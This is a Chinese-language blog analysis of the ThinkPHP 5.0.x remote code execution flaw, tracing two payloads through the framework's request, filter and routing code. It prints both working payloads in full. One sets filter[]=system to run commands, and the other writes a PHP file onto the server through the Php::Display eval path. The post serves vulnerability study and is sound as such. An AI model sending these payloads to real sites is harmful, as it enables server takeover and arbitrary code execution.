Thinkphp5.0.0-5.0.18 RCE分析

简介: 本篇文章基于thinkphp5.*框架,分析两种payload的构成以及执行流程

0x00.前言

本篇文章基于thinkphp5.*框架,分析两种payload的构成以及执行流程

准备

Windows+phpstudy

tp版本:thinkphp_5.0.5_full

php版本:5.4.45

phpstorm+xdebug

0x01.Payload1

开始分析

漏洞代码位于:thinkphp/library/think/Request.php

首先放上payload:

s=whoami&_method=__construct&method=post&filter[]=system

图1

method方法主要用来判断请求方式,首先分析一下这段代码的逻辑:通过$_SERVERserver方法获取请求类型,如果不存在method变量值,那么就用表单请求类型伪装变量覆盖method的值,那么就可以利用这点调用其他函数,预定义里面methodfalse,那么就会直接走下一步的是否存在表单覆盖变量

图2

get方法中获取var_method的值,值为_method

图3

config.php已经有默认值,但我们构造的payload里面传值_method=__construct就是变量覆盖,因此下一步会走到__construct方法

// 表单请求类型伪装变量    'var_method'             => '_method',

继续往下跟代码,来到__construct构造方法,将数组option进行遍历操作,如果option的键名为该属性的话,则将该同名的属性赋值给\$option的键值,如果filter为空的空,就调用默认的default_filter

图4

filter方法:

public function filter($filter = null)    {        if (is_null($filter)) {            return $this->filter;        } else {            $this->filter = $filter;        }    }

而默认的过滤方法为空

// 默认全局过滤方法 用逗号分隔多个    'default_filter'         => '',

在构造函数里面走完filter之后会走input方法,继续跟进

图5

继续往下跟,这里的method已经为post方法,所以进入param方法里的post是直接break

图6

下一步进入filtervalue方法中,可以看到我们要传入的值已经全部传进了,call_user_func()函数将我们传入的\$filter=system作为回调函数调用,也就达到了RCE的目的

图7图8图9

0x02.Payload2

前提

该利用的重点在于在一定条件下可以使用::来调用非静态方法

首先我们需要了解静态属性和静态方法是如何调用的,静态属性一般使用**self::**进行调用,但是在该篇博客上面使用了::的骚操作,用::调用非静态方法

<?phpclass People{    static public $name = "pana";    public $height = 170;    static public function output(){        //静态方法调用静态属性使用self        print self::$name."<br>";        //静态方法调用非静态属性(普通方法)需要先实例化对象        $t = new People() ;        print $t -> height."<br>";    }    public function say(){        //普通方法调用静态属性使用self        print self::$name."<br>";        //普通方法调用普通属性使用$this        print $this -> height."<br>";    }}$pa = new People();$pa -> output();$pa -> say();//可以使用::调用普通方法$pan = People::say();

可以看到最后的输出,仍然输出了name的值,但是却没有输出height的值

图10

原因在于:php里面使用双冒号调用方法或者属性时候有两种情况:

直接使用::调用静态方法或者属性

::调用普通方法时,需要该方法内部没有调用非静态的方法或者变量,也就是没有使用$this,这也就是为什么输出了name的值而没有输出height

了解上面这些,我们就可以开始下面的分析

0x03.分析

先放上流程图(本人比较菜鸡 所以只能用这种方法记录下来流程)

图11

首先放上payload

path=<?php file_put_contents('ccc.php','<?php phpinfo();?>'); ?>&_method=__construct&filter[]=set_error_handler&filter[]=self::path&filter[]=\think\view\driver\Php::Display&method=GET

payload的分析

使用file_put_contents()写入,使用变量覆盖将_method的值设置为_construct,这里的set_error_handler是设置用户自定义的错误处理程序,能够绕过标准的php错误处理程序,接下来就是调用\think\view\driver\Php下面的Display方法,因为我们要利用里面的

eval('?>' . $content);

完成RCE的目的

图12

虽然会报错,但是不影响写入

图13

首先从App.php开始,在routeCheck方法处打断点

public static function routeCheck($request, array $config){    $path   = $request->path();    $depr   = $config['pathinfo_depr'];    $result = false;    // 路由检测    $check = !is_null(self::$routeCheck) ? self::$routeCheck : $config['url_route_on'];    if ($check) {        // 开启路由        if (is_file(RUNTIME_PATH . 'route.php')) {            // 读取路由缓存            $rules = include RUNTIME_PATH . 'route.php';            if (is_array($rules)) {                Route::rules($rules);            }        } else {            $files = $config['route_config_file'];            foreach ($files as $file) {                if (is_file(CONF_PATH . $file . CONF_EXT)) {                    // 导入路由配置                    $rules = include CONF_PATH . $file . CONF_EXT;                    if (is_array($rules)) {                        Route::import($rules);                    }                }            }        }

这一步主要是获取$path的值,也就是我们要走的路由captcha

图14

继续往下走,$result = Route::check($request, $path, $depr, $config['url_domain_deploy']);,跟进check方法,这里面的重点就是获取method的值,$request->method()

图15

这里是调用var_method,因为我们传入了_method=__construct,也就是变量覆盖,这些步骤和上面的几乎一样

图16

那下一步继续跟进__construct,走完construct函数后,可以看到大部分的值都是我们希望传进去的,这时method的值为GET,也就是为什么payload里面要传GET的原因

图17

下一步要获取当前请求类型的路由规则

$rules = self::$rules[$method];

可以看到这里的ruleroute的值都发生了改变,路由值为\think\captcha\CaptchaController@index

图18

接下来跟进routeCheck()方法,走完这个方法后,返回result

图19

接下来进入dispatch方法

图20图21

接下来进入param方法,合并请求参数和url地址栏的参数

$this->param = array_merge($this->get(false), $vars, $this->route(false));

图22

然后进入get方法,继续跟进input方法

图23图24

然后就会回到filterValue方法执行任意方法

图25

相关文章
|
7月前
|
安全 Linux PHP
【攻防世界】php_rce (ThinkPHP5)
【攻防世界】php_rce (ThinkPHP5)
|
安全 Linux PHP
#Thinkphp5.x漏洞
#Thinkphp5.x漏洞
80 0
|
开发框架 安全 PHP
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
612 0
|
开发框架 安全 PHP
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
994 0
|
安全 调度 PHP
Thinkphp5.0.*之RCE漏洞分析
Thinkphp5.0.*之RCE漏洞分析
|
安全 网络协议 Unix
Thinkphp5 RCE 检测工具
Thinkphp5 RCE 检测工具
Thinkphp5 RCE 检测工具
|
安全 JavaScript
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析(二)
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析
312 0
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析(二)
|
安全 JavaScript 前端开发
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析(一)
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析
248 0
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析(一)
|
缓存 开发框架 安全
15 ThinkPhp漏洞介绍及利用
Thinkphp介绍 Thinkphp是一种开源框架。是一个由国人开发的支持windows/Unix/Linux等服务器环境的轻量级PHP开发框架。很多cms就是基于thinkphp二次开发的,所thinkphp出问题的话,会影响很多基于thinkphp开发的网站。
15 ThinkPhp漏洞介绍及利用
|
开发框架 安全 PHP
ThinkPHP5 5.0.20 远程代码执行漏洞
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
1153 0
ThinkPHP5 5.0.20 远程代码执行漏洞